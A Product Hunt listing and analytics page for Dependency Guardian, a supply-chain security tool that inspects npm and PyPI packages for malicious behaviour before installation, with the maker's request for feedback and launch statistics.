This product was not featured by Product Hunt yet. It will not be visible on their landing page and won't be ranked (cannot win product of the day regardless of upvotes).
Product upvotes vs the next 3
Waiting for data. Loading
Product comments vs the next 3
Waiting for data. Loading
Product upvote speed vs the next 3
Waiting for data. Loading
Product upvotes and comments
Waiting for data. Loading
Product vs the next 3
Loading
Dependency Guardian
Supply chain protection that blocks malware at install
I've been building a tool called Dependency Guardian, and I'm looking for developers and security engineers to try it out.
I built it because I wanted protection from malicious npm and PyPI packages without changing how I work. When I went looking for something that already did this, I noticed traditional CVE based scanning had a blind spot where it only catches problems after they've been reported, and assigned a CVE. Which leaves a window where a malicious package can spread before anyone flags it.
The tool sits in front of package installs and inspects everything that actually lands on your machine. analyzing packages for suspicious behavior and supply chain risk signals before they install.
A few things it does:
Aliases to npm install and pip, so you keep using the commands you already know
Returns a warn, block, or pass, and prompts on ambiguity
Runs as both a GitHub App and a CLI
I'd really like feedback from engineers who work with Node, Python, or dependency security. What would stop you from trusting a tool like this? And what would make it useful enough to run every day?
About Dependency Guardian on Product Hunt
“Supply chain protection that blocks malware at install ”
Dependency Guardian was submitted on Product Hunt and earned 4 upvotes and 1 comments, placing #130 on the daily leaderboard. Static supply chain scanner catches npm & PyPI attack patterns CVE databases miss: install scripts, credential theft, child process spawning, network exfil. 100 detectors, sandbox routing for eligible packages, GitHub App + CLI. Free plan.
On the analytics side, Dependency Guardian competes within Security — topics that collectively have 2.7k followers on Product Hunt. The dashboard above tracks how Dependency Guardian performed against the three products that launched closest to it on the same day.
Who hunted Dependency Guardian?
Dependency Guardian was hunted by mckeane mcbrearty. A “hunter” on Product Hunt is the community member who submits a product to the platform — uploading the images, the link, and tagging the makers behind it. Hunters typically write the first comment explaining why a product is worth attention, and their followers are notified the moment they post. Around 79% of featured launches on Product Hunt are self-hunted by their makers, but a well-known hunter still acts as a signal of quality to the rest of the community. See the full all-time top hunters leaderboard to discover who is shaping the Product Hunt ecosystem.
For a complete overview of Dependency Guardian including community comment highlights and product details, visit the product overview.
mckeane mcbrearty